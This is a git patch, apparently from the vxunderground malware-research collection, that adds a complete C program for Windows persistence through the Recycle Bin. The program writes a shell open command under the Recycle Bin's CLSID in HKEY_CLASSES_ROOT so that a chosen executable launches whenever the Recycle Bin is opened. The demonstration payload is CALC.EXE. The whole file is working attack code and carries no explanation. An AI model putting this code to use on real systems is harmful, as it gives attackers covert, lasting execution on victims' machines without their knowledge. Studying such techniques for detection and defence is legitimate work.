From 4a28961a43393eaf81c9814e39f0201b1632e83a Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Thu, 18 Nov 2021 08:07:55 -0600 Subject: [PATCH] Add files via upload --- .../Persistence_via_Recycle_Bin.c | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c diff --git a/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c b/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c new file mode 100644 index 0000000..ee77a7f --- /dev/null +++ b/The Persistence Series/Persistence via Recycle Bin/Persistence_via_Recycle_Bin.c @@ -0,0 +1,73 @@ +#include +#include + +#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR)) + +DWORD P0x4(VOID); + +int main(VOID) +{ + DWORD dwReturn = ERROR_SUCCESS; + dwReturn = P0x4(); + + if (dwReturn != ERROR_SUCCESS) + { + return dwReturn; + } + + return ERROR_SUCCESS; +} + +DWORD P0x4(VOID) +{ + HKEY hKey = HKEY_CLASSES_ROOT; + WCHAR lpSubKey[WCHAR_MAXPATH] = L"CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command"; + WCHAR lpData[WCHAR_MAXPATH] = L"CALC.EXE"; + HKEY phkResult = NULL; + HKEY hkResult; + DWORD dispositions; + + if (RegCreateKeyEx(hKey, lpSubKey, 0, NULL, + REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkResult, &dispositions) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (RegSetValueEx(phkResult, NULL, 0, REG_SZ, (PBYTE)lpData, sizeof(lpData)) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (phkResult) + { + RegCloseKey(phkResult); + } + + if (hkResult) + { + RegCloseKey(hkResult); + } + + return ERROR_SUCCESS; + +EXIT_ROUTINE: + + DWORD dwError = GetLastError(); + + if (phkResult) + { + RegCloseKey(phkResult); + } + + if (hkResult) + { + RegCloseKey(hkResult); + } + + return dwError; +} \ No newline at end of file